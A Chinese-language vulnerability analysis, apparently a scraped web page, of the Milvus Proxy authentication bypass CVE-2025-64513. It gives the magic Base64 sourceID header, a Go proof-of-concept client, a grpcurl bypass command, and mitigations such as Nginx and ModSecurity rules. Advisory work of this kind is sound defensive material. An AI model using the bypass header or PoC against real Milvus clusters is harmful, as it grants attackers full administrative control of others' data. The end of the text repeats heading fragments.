Milvus Proxy身份验证绕过漏洞（CVE-2025-64513）技术分析文档<\/h1>

漏洞概述<\/h2>
CVE编号<\/strong>：CVE-2025-64513
漏洞类型<\/strong>：身份验证绕过
影响组件<\/strong>：Milvus Proxy
威胁等级<\/strong>：严重<\/p>
Milvus是一个为生成式人工智能应用程序构建的开源向量数据库。该漏洞允许未经身份验证的攻击者绕过Milvus Proxy组件的所有身份验证机制，获得对Milvus集群的完整管理权限。<\/p>

影响版本<\/h2>

Milvus版本早于2.4.24<\/li>
Milvus版本早于2.5.21<\/li>
Milvus版本早于2.6.5<\/li> <\/ul>
漏洞描述<\/h2>
攻击者利用此漏洞可完全绕过身份验证，直接获得Milvus集群的管理员权限。成功利用后，攻击者能够：<\/p>

读取、修改或删除数据库中的数据<\/li>
执行特权管理操作（如数据库或集合管理）<\/li>
控制整个Milvus集群<\/li> <\/ul>
技术分析<\/h2>
漏洞根源<\/h3>
漏洞存在于Milvus Proxy的认证拦截器（authentication_interceptor.go<\/code>）中。具体问题在于validSourceID<\/code>方法的认证逻辑缺陷。<\/p>
关键代码分析<\/h4> \/\/ 认证拦截器处理逻辑 <\/span><\/span><\/span><\/span>func<\/span> (interceptor<\/span> *<\/span>AuthenticationInterceptor<\/span>) validSourceID<\/span>(sourceID<\/span> string<\/span>) bool<\/span> { <\/span><\/span> decoded<\/span>, err<\/span> :=<\/span> base64<\/span>.StdEncoding<\/span>.DecodeString<\/span>(sourceID<\/span>) <\/span><\/span> if<\/span> err<\/span> !=<\/span> nil<\/span> { <\/span><\/span> return<\/span> false<\/span> <\/span><\/span> } <\/span><\/span> return<\/span> string(decoded<\/span>) ==<\/span> util<\/span>.MemberCredID<\/span> <\/span><\/span>} <\/span><\/span><\/code><\/pre>其中util.MemberCredID<\/code>为硬编码值：@@milvus-member@@<\/code><\/p> 认证绕过机制<\/h4> 当gRPC请求头中的sourceID<\/code>字段经过Base64解码后与硬编码值@@milvus-member@@<\/code>匹配时，validSourceID<\/code>方法返回true<\/code>，导致认证拦截器跳过后续的所有身份验证检查。<\/p> 攻击向量<\/h3> 攻击者只需在gRPC请求的metadata中设置特定的sourceID头即可绕过认证：<\/p> sourceid: QEBtaWx2dXMtbWVtYmVyQEA= <\/span><\/span><\/span><\/code><\/pre>（此为@@milvus-member@@<\/code>的Base64编码）<\/p> 漏洞复现<\/h2> 环境准备<\/h3> 受影响版本的Milvus集群（<2.4.24\/2.5.21\/2.6.5）<\/li> Go语言开发环境<\/li> Milvus Go SDK<\/li> <\/ul> PoC代码<\/h3> package<\/span> main<\/span> <\/span><\/span> <\/span><\/span>import<\/span> ( <\/span><\/span> "context"<\/span> <\/span><\/span> "encoding\/base64"<\/span> <\/span><\/span> "fmt"<\/span> <\/span><\/span> "log"<\/span> <\/span><\/span> "time"<\/span> <\/span><\/span> <\/span><\/span> "google.golang.org\/grpc"<\/span> <\/span><\/span> "google.golang.org\/grpc\/metadata"<\/span> <\/span><\/span> "github.com\/milvus-io\/milvus-proto\/go-api\/v2\/milvuspb"<\/span> <\/span><\/span>) <\/span><\/span> <\/span><\/span>func<\/span> main<\/span>() { <\/span><\/span> \/\/ 目标Milvus服务器地址 <\/span><\/span><\/span><\/span> target<\/span> :=<\/span> "localhost:19530"<\/span> <\/span><\/span> memberCredID<\/span> :=<\/span> "@@milvus-member@@"<\/span> <\/span><\/span> encodedSourceID<\/span> :=<\/span> base64<\/span>.StdEncoding<\/span>.EncodeToString<\/span>([]byte(memberCredID<\/span>)) <\/span><\/span> <\/span><\/span> \/\/ 建立gRPC连接 <\/span><\/span><\/span><\/span> fmt<\/span>.Printf<\/span>("连接到 Milvus: %s\n"<\/span>, target<\/span>) <\/span><\/span> conn<\/span>, err<\/span> :=<\/span> grpc<\/span>.Dial<\/span>(target<\/span>, grpc<\/span>.WithInsecure<\/span>(), grpc<\/span>.WithBlock<\/span>(), grpc<\/span>.WithTimeout<\/span>(5<\/span>*<\/span>time<\/span>.Second<\/span>)) <\/span><\/span> if<\/span> err<\/span> !=<\/span> nil<\/span> { <\/span><\/span> log<\/span>.Fatalf<\/span>("连接失败: %v"<\/span>, err<\/span>) <\/span><\/span> } <\/span><\/span> defer<\/span> conn<\/span>.Close<\/span>() <\/span><\/span> <\/span><\/span> client<\/span> :=<\/span> milvuspb<\/span>.NewMilvusServiceClient<\/span>(conn<\/span>) <\/span><\/span> md<\/span> :=<\/span> metadata<\/span>.New<\/span>(map<\/span>[string<\/span>]string<\/span>{ <\/span><\/span> "sourceid"<\/span>: encodedSourceID<\/span>, \/\/ 关键：设置绕过认证的sourceID <\/span><\/span><\/span><\/span> }) <\/span><\/span> ctx<\/span> :=<\/span> metadata<\/span>.NewOutgoingContext<\/span>(context<\/span>.Background<\/span>(), md<\/span>) <\/span><\/span> <\/span><\/span> fmt<\/span>.Println<\/span>("开始测试认证绕过..."<\/span>) <\/span><\/span> <\/span><\/span> \/\/ 1. 检查连接状态 <\/span><\/span><\/span><\/span> fmt<\/span>.Println<\/span>("\n1. 检查连接状态..."<\/span>) <\/span><\/span> healthReq<\/span> :=<\/span> &<\/span>milvuspb<\/span>.CheckHealthRequest<\/span>{} <\/span><\/span> healthResp<\/span>, err<\/span> :=<\/span> client<\/span>.CheckHealth<\/span>(ctx<\/span>, healthReq<\/span>) <\/span><\/span> if<\/span> err<\/span> !=<\/span> nil<\/span> { <\/span><\/span> log<\/span>.Printf<\/span>("健康检查失败: %v"<\/span>, err<\/span>) <\/span><\/span> } else<\/span> { <\/span><\/span> fmt<\/span>.Printf<\/span>("健康检查成功! 状态: %v\n"<\/span>, healthResp<\/span>.IsHealthy<\/span>) <\/span><\/span> } <\/span><\/span> <\/span><\/span> \/\/ 2. 列出所有数据库 <\/span><\/span><\/span><\/span> fmt<\/span>.Println<\/span>("\n2. 获取数据库列表..."<\/span>) <\/span><\/span> dbReq<\/span> :=<\/span> &<\/span>milvuspb<\/span>.ListDatabasesRequest<\/span>{} <\/span><\/span> dbResp<\/span>, err<\/span> :=<\/span> client<\/span>.ListDatabases<\/span>(ctx<\/span>, dbReq<\/span>) <\/span><\/span> if<\/span> err<\/span> !=<\/span> nil<\/span> { <\/span><\/span> log<\/span>.Printf<\/span>("列出数据库失败: %v"<\/span>, err<\/span>) <\/span><\/span> } else<\/span> { <\/span><\/span> fmt<\/span>.Printf<\/span>("数据库列表: %v\n"<\/span>, dbResp<\/span>.DbNames<\/span>) <\/span><\/span> } <\/span><\/span> <\/span><\/span> \/\/ 3. 获取服务器版本信息 <\/span><\/span><\/span><\/span> fmt<\/span>.Println<\/span>("\n4. 获取版本信息..."<\/span>) <\/span><\/span> versionReq<\/span> :=<\/span> &<\/span>milvuspb<\/span>.GetVersionRequest<\/span>{} <\/span><\/span> versionResp<\/span>, err<\/span> :=<\/span> client<\/span>.GetVersion<\/span>(ctx<\/span>, versionReq<\/span>) <\/span><\/span> if<\/span> err<\/span> !=<\/span> nil<\/span> { <\/span><\/span> log<\/span>.Printf<\/span>("获取版本失败: %v"<\/span>, err<\/span>) <\/span><\/span> } else<\/span> { <\/span><\/span> fmt<\/span>.Printf<\/span>("Milvus版本: %s\n"<\/span>, versionResp<\/span>.GetVersion<\/span>()) <\/span><\/span> } <\/span><\/span> <\/span><\/span> fmt<\/span>.Println<\/span>("\n=== 漏洞验证完成 ==="<\/span>) <\/span><\/span>} <\/span><\/span><\/code><\/pre>检测步骤<\/h3> 使用上述PoC代码连接目标Milvus实例<\/li> 观察是否能够成功执行需要认证的操作：健康检查通过<\/li> 能够列出数据库<\/li> 能够获取版本信息<\/li> <\/ul> <\/li> 如果以上操作均成功执行，说明存在漏洞<\/li> <\/ol> 修复方案<\/h2> 正式修复<\/h3> 升级到安全版本<\/strong>：<\/p> Milvus 2.4.24 或更高版本<\/li> Milvus 2.5.21 或更高版本<\/li> Milvus 2.6.5 或更高版本<\/li> <\/ul> 临时缓解措施<\/h3> 如果无法立即升级，可通过以下方式临时防护：<\/p> 方案一：网关层过滤<\/h4> 在请求到达Milvus Proxy之前，通过网关、API网关或负载均衡器删除所有传入请求的sourceID<\/code>标头：<\/p> Nginx配置示例<\/strong>：<\/p> location<\/span> \/milvus\/<\/span> { <\/span><\/span> proxy_pass<\/span> http:\/\/milvus-proxy:19530<\/span>; <\/span><\/span> proxy_set_header<\/span> sourceid<\/span> ""<\/span>; <\/span><\/span>} <\/span><\/span><\/code><\/pre>方案二：WAF规则<\/h4> 添加Web应用防火墙规则，拦截包含sourceid<\/code>头的请求：<\/p> # 示例：ModSecurity规则<\/span> <\/span><\/span>SecRule REQUEST_HEADERS:sourceid "!^<\/span>$"<\/span> "deny,status:403,msg:'CVE-2025-64513 Exploit Attempt'"<\/span> <\/span><\/span><\/code><\/pre>修复验证<\/h2> 验证方法<\/h3> 升级后使用相同PoC代码测试<\/li> 确认认证绕过不再有效<\/li> 未认证请求应返回认证错误<\/li> <\/ol> 验证命令<\/h3> # 检查Milvus版本<\/span> <\/span><\/span>curl -X GET http:\/\/milvus-host:19530\/version <\/span><\/span> <\/span><\/span># 尝试未认证访问（应失败）<\/span> <\/span><\/span>grpcurl -plaintext -H "sourceid: QEBtaWx2dXMtbWVtYmVyQEA="<\/span> milvus-host:19530 list <\/span><\/span><\/code><\/pre>参考链接<\/h2> Milvus安全公告<\/a><\/li> 漏洞修复PR #45377<\/a><\/li> CVE-2025-64513官方记录<\/a><\/li> <\/ol> 总结<\/h2> CVE-2025-64513是一个严重的身价验证绕过漏洞，攻击者利用简单的请求头 manipulation即可获得Milvus集群的完全控制权。建议所有使用受影响版本的用户立即采取修复措施，优先选择版本升级方案，如条件限制可采用临时缓解方案并尽快安排升级计划。<\/p>

Milvus Proxy身份验证绕过漏洞（CVE-2025-64513）技术分析文档<\/h1>

技术分析<\/h2>

漏洞根源<\/h3> 漏洞存在于Milvus Proxy的认证拦截器（authentication_interceptor.go<\/code>）中。具体问题在于validSourceID<\/code>方法的认证逻辑缺陷。<\/p>

修复方案<\/h2>

临时缓解措施<\/h3> 如果无法立即升级，可通过以下方式临时防护：<\/p>

修复验证<\/h2>

漏洞根源<\/h3>
漏洞存在于Milvus Proxy的认证拦截器（`authentication_interceptor.go<\/code>）中。具体问题在于validSourceID<\/code>方法的认证逻辑缺陷。<\/p>`

临时缓解措施<\/h3>
如果无法立即升级，可通过以下方式临时防护：<\/p>